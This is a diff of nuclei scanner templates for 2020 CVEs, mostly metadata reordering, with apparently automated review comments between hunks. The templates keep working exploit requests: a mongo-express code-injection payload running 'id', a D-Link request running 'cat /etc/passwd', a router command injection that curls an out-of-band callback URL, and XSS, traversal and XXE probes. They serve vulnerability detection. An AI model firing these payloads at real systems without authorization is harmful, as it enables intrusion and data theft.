@@ -15,11 +15,14 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:*:*:* - epss-score: 0.97485 - tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive + epss-score: 0.97446 + cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: gvectors + product: wpdiscuz + tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive http: - raw: @@ -27,7 +30,6 @@ http: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} @@ -60,21 +62,6 @@ http: 1 ------WebKitFormBoundary88AhjLimsDMHU1Ak-- - extractors: - - type: regex - part: body - internal: true - name: wmuSecurity - group: 1 - regex: - - 'wmuSecurity":"([a-z0-9]+)' - - - type: regex - part: body - group: 1 - regex: - - '"url":"([a-z:\\/0-9-.]+)"' - matchers-condition: and matchers: - type: word @@ -89,3 +76,18 @@ http: - type: status status: - 200 + + extractors: + - type: regex + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + internal: true + part: body + + - type: regex + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + part: body diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 46a2f3f962..2e9b0d2757 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml 
@@ -15,26 +15,31 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 - cpe: cpe:2.3:a:mara_cms_project:mara_cms:*:*:*:*:*:*:*:* - epss-score: 0.01034 - tags: cve,cve2020,mara,xss,edb + epss-score: 0.00976 + cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mara_cms_project + product: mara_cms + tags: cve,cve2020,mara,xss,edb http: - method: GET path: - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + matchers-condition: and matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - '">' - part: body - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 05d170cd6f..5dde1284ee 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -14,11 +14,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:*:*:* - epss-score: 0.02595 - tags: cve,cve2020,wordpress,backups,plugin + epss-score: 0.02033 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: webdesi9 + product: file_manager + tags: cve,cve2020,wordpress,backups,plugin http: - method: GET @@ -27,13 +30,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'Index of' - 'wp-content/uploads/wp-file-manager-pro/fm_backup' - 'backup_' condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 1c24adb7d9..40ce478a1f 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml 
@@ -14,31 +14,33 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:* - epss-score: 0.49283 - tags: cve,cve2020,mongo,express,rce,intrusive + epss-score: 0.48236 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 + framework: node.js + vendor: mongo-express_project + product: mongo-express + tags: cve,cve2020,mongo,express,rce,intrusive http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ - - | GET /public/css/{{randstr}}.css HTTP/1.1 Host: {{Hostname}} - req-condition: true cookie-reuse: true + req-condition: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 94ea1bf799..4884a2309a 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24550 cwe-id: CWE-601 - cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* epss-score: 0.00157 - tags: cve,cve2020,redirect,episerver + cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: episerver + product: find + tags: cve,cve2020,redirect,episerver http: - method: GET diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 9160dd33a2..18be48982a 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml 
@@ -13,11 +13,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24571 cwe-id: CWE-22 + epss-score: 0.02885 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* - epss-score: 0.03491 - tags: cve,cve2020,nexusdb,lfi metadata: max-request: 1 + vendor: nexusdb + product: nexusdb + tags: cve,cve2020,nexusdb,lfi http: - method: GET @@ -27,9 +29,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "[extensions]" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 64ba8d0b50..11426fb13d 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -14,10 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.00215 - tags: cve,cve2020,dlink,rce + epss-score: 0.00642 + cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: dlink + product: dsl2888a_firmware + tags: cve,cve2020,dlink,rce http: - raw: @@ -27,7 +30,6 @@ http: Cookie: uid=6gPjT2ipmNz username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} @@ -35,12 +37,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "nobody:[x*]:65534:65534" - "root:.*:0:0:" condition: or + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 0a44ef2582..5336c2ad97 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml 
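Review bot: In the CVE-2020-24579 raw-request hunk, the line `# Get /etc/passwd` sits between `- |` and the `GET /cgi-bin/execute_cmd.cgi...` request line; if it is indented as part of that literal block scalar, YAML treats it as content rather than a comment, and it becomes the first line of the raw request sent to the device. Indentation is not recoverable from this rendering, so this is inferred; unless nuclei's raw parser is known to skip `#` lines, the safer form is to move the comment above the `- |` item (at sequence-item indentation) or drop it, since the request line already states what it fetches. The hunk only removes the blank line between the two raw requests, so the placement is pre-existing rather than introduced by this change.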
@@ -12,10 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2020-24589 - epss-score: 0.48841 - tags: cve,cve2020,wso2,xxe,oast,blind + cwe-id: CWE-611 + epss-score: 0.55262 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: cve,cve2020,wso2,xxe,oast,blind http: - raw: diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 90193f2ad5..c2569a13b5 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -14,13 +14,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 - cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* epss-score: 0.00171 + cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: intitle:"My Download Server" shodan-query: http.title:"My Download Server" verified: true + vendor: quixplorer_project + product: quixplorer tags: cve,cve2020,quixplorer,xss http: @@ -30,6 +32,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index eeda313f3c..b55b207bdc 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -14,12 +14,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 - cpe: cpe:2.3:a:cutesoft:cute_editor:*:*:*:*:*:*:*:* epss-score: 0.00246 + cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: max-request: 1 shodan-query: http.component:"ASP.NET" verified: true + framework: asp.net + vendor: cutesoft + product: cute_editor tags: cve,cve2020,cuteeditor,xss,seclists http: diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 7cc5e8d6c4..f3c9ff5e48 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml 
@@ -10,16 +10,19 @@ info: - https://github.com/qcubed/qcubed/pull/1320/files - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 + - http://qcubed.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24912 cwe-id: CWE-79 - cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* epss-score: 0.00187 - tags: cve,cve2020,qcubed,xss,seclists + cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: qcubed + product: qcubed + tags: cve,cve2020,qcubed,xss,seclists http: - method: POST @@ -27,19 +30,20 @@ http: - "{{BaseURL}}/assets/_core/php/profile.php" - "{{BaseURL}}/assets/php/profile.php" - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + headers: Content-Type: application/x-www-form-urlencoded - body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - type: word + part: header words: - 'Content-Type: text/html' - part: header diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 0585a2aa89..c306a273d1 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml 
@@ -15,11 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24949 cwe-id: CWE-77 - cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:* - epss-score: 0.96895 - tags: rce,php,packetstorm,cve,cve2020,phpfusion + epss-score: 0.96607 + cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: php-fusion + product: php-fusion + tags: rce,php,packetstorm,cve,cve2020,phpfusion http: - method: GET @@ -28,12 +30,11 @@ http: matchers-condition: and matchers: - - - type: status - status: - - 200 - - type: word part: body words: - "infusion_db.php" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 2b62b93f05..642eb77ca6 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 - epss-score: 0.96698 - tags: cve,cve2020,dlink + epss-score: 0.96829 + cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dcs-2530l_firmware + tags: cve,cve2020,dlink http: - method: GET @@ -32,9 +35,9 @@ http: condition: and - type: word + part: header words: - "text/plain" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index cb9e86ae2b..c6de6f2eee 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -2,7 +2,6 @@ id: CVE-2020-25213 # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt - info: name: WordPress File Manager Plugin - Remote Code Execution author: foulenzer 
@@ -13,15 +12,19 @@ info: - https://github.com/w4fz5uck5/wp-file-manager-0day - https://nvd.nist.gov/vuln/detail/CVE-2020-25213 - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:*:*:* - epss-score: 0.97389 + epss-score: 0.9739 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: webdesi9 + product: file_manager tags: wordpress,rce,kev,fileupload,intrusive,packetstorm,cve,cve2020 http: @@ -70,4 +73,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index a5ab7da6f3..a6339d368d 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -10,15 +10,19 @@ info: - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223 - https://nvd.nist.gov/vuln/detail/CVE-2020-25223 - https://community.sophos.com/b/security-blog + - https://cwe.mitre.org/data/definitions/78.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25223 + cwe-id: CWE-78 + epss-score: 0.97526 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* - epss-score: 0.97478 - tags: cve,cve2020,sophos,rce,oast,unauth,kev metadata: max-request: 1 + vendor: sophos + product: unified_threat_management + tags: cve,cve2020,sophos,rce,oast,unauth,kev http: - raw: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index b99a0caf06..b7cd395530 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml 
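Review bot: In the CVE-2020-25223 info hunk, the new reference `https://cwe.mitre.org/data/definitions/78.html` is a generic weakness-definition page rather than a source for this vulnerability, and it duplicates the `cwe-id: CWE-78` line added in the same hunk. None of the other templates touched in this commit list a CWE page under `reference:`, so for consistency the line `- https://cwe.mitre.org/data/definitions/78.html` can be dropped and the cwe-id kept as the machine-readable link to the weakness class.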
@@ -15,29 +15,31 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - cpe: cpe:2.3:a:xinuos:openserver:*:*:*:*:*:*:*:* epss-score: 0.00153 - tags: cve,cve2020,sco,xss,edb,packetstorm + cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xinuos + product: openserver + tags: cve,cve2020,sco,xss,edb,packetstorm,intrusive http: - method: GET path: - - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E' + - "{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word + part: body + words: + -

    hello

    + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - words: - - "

    hello

    " - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index b04cc45316..359e63fa98 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -9,16 +9,20 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 + - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183 + - https://www.dlink.com/en/security-bulletin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25506 cwe-id: CWE-78 - epss-score: 0.97445 - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev + epss-score: 0.97451 + cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: dlink + product: dns-320_firmware + tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: useragent: '{{rand_base(6)}}' @@ -30,7 +34,6 @@ http: Accept: */* C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 Host: {{Hostname}} @@ -39,7 +42,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index dc1dd03241..1178ef1a59 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml 
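Review bot: In the CVE-2020-25495 info hunk, `intrusive` is appended to `tags:` for a template whose only request is a single GET to `/cgi-bin/manlist` with a reflected script payload, while the other reflected-XSS templates in this same commit (CVE-2020-19515, CVE-2020-24223, CVE-2020-24902) are not tagged that way. Because `intrusive` is a tag operators commonly filter out in non-intrusive runs, this would silently drop a read-only check from such runs; unless the manlist CGI is known to have a side effect, restoring `tags: cve,cve2020,sco,xss,edb,packetstorm` looks right. The rest of the hunk (matcher reorder and the quote change on the path) is fine, though the body-matcher words are not legible in this rendering and were not reviewed.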
@@ -14,11 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97281 - tags: cve,cve2020,oracle,weblogic,rce,unauth + epss-score: 0.97468 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,weblogic,rce,unauth http: - method: GET @@ -28,18 +30,18 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "10.3.6.0" - "12.1.3.0" - "12.2.1.3" - "12.2.1.4" condition: or - part: body - type: word + part: body words: - "WebLogic" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index d5d2f94c94..75237d4018 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -16,11 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - cpe: cpe:2.3:a:ctolog:thinkadmin:*:*:*:*:*:*:*:* - epss-score: 0.96472 - tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 + epss-score: 0.96525 + cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ctolog + product: thinkadmin + tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 http: - method: GET @@ -29,9 +31,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index ccfac95ef6..fd1d78a082 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml 
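Review bot: The matchers in the CVE-2020-2551 hunk still only prove that the body carries `WebLogic` plus one of the four version strings; nothing exercises the IIOP deserialization the CVE describes, and as far as I know Oracle's fix ships as a CPU patch that leaves the version banner unchanged, so a patched 12.2.1.4 instance matches exactly like a vulnerable one. That is worth saying in the template instead of leaving it to the `rce` tag: add `# version-banner check only; does not confirm the IIOP deserialization path is exposed` above the first `- type: word`, and state in the description that a hit needs manual confirmation. The request the matchers apply to starts above this hunk.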
@@ -14,32 +14,34 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 + epss-score: 0.01865 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* - epss-score: 0.03084 - tags: cve,cve2020,commvault,lfi metadata: max-request: 1 + vendor: commvault + product: commcell + tags: cve,cve2020,commvault,lfi http: - method: POST path: - "http://{{Host}}:81/SearchSvc/CVSearchService.svc" + body: | + + + + + c:/Windows/system.ini + + + + headers: Cookie: Login soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile content-type: text/xml - body: | - - - - - c:/Windows/system.ini - - - - matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 806ac341a5..1c000c4bc5 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -10,17 +10,20 @@ info: - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 - https://www.hashicorp.com/blog/category/consul - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 + - https://security.gentoo.org/glsa/202208-09 remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-25864 cwe-id: CWE-79 - cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* epss-score: 0.00255 - tags: cve,cve2020,consul,xss + cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 + vendor: hashicorp + product: consul + tags: cve,cve2020,consul,xss,intrusive http: - raw: @@ -29,24 +32,24 @@ http: Host: {{Hostname}} - - | GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - - "text/html" + - text/html - type: word part: body_2 words: - - "" + - + + - type: status + status: + - 200 
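Review bot: The `{{randstr}}` key this CVE-2020-25864 hunk reads back with `GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw` is left in the target's Consul KV store after the scan; the request above the hunk, whose body is outside it, presumably writes it, and nothing deletes it, which justifies the `intrusive` tag but also leaves one stray key per run. Add a third request `DELETE {{BaseURL}}/v1/kv/{{randstr}}` after the GET (the body matcher already pins `body_2`; check that the header matcher still evaluates against the intended response once a third one exists), or say in the description that the key has to be removed by hand. The payload string in the `body_2` word matcher is not legible in this rendering, so I could not check that it matches what the first request stores.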
diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index eaca48af7b..f8cabdf4d4 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-26153 cwe-id: CWE-79 - cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:*:*:* epss-score: 0.00127 - tags: cve,cve2020,xss,wordpress,wp-plugin + cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: eventespresso + product: event_espresso + tags: cve,cve2020,xss,wordpress,wp-plugin http: - method: GET @@ -29,15 +32,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '"/>' - part: body - - - type: status - status: - - 500 - type: word part: header words: - text/html + + - type: status + status: + - 500 diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 4021a65310..b096037fe3 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -10,16 +10,19 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26214 + - https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26214 cwe-id: CWE-287 + epss-score: 0.01365 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* - epss-score: 0.01307 - tags: cve,cve2020,alerta,auth-bypass metadata: max-request: 1 + vendor: alerta_project + product: alerta + tags: cve,cve2020,alerta,auth-bypass http: - method: GET @@ -28,6 +31,9 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - compare_versions(version, '< 8.1.0') - type: word part: body 
@@ -37,10 +43,6 @@ http: - '"severity"' condition: and - - type: dsl - dsl: - - compare_versions(version, '< 8.1.0') - - type: status status: - 200 @@ -48,10 +50,10 @@ http: extractors: - type: regex name: version - internal: true group: 1 regex: - '"name": "Alerta ([0-9.]+)"' + internal: true - type: regex group: 1 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index ea5d05b235..cb4acd7b2f 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -11,6 +11,7 @@ info: - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2 - https://nvd.nist.gov/vuln/detail/cve-2020-26217 + - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E remediation: Fixed in 1.4.14. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H @@ -18,9 +19,12 @@ info: cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97456 - 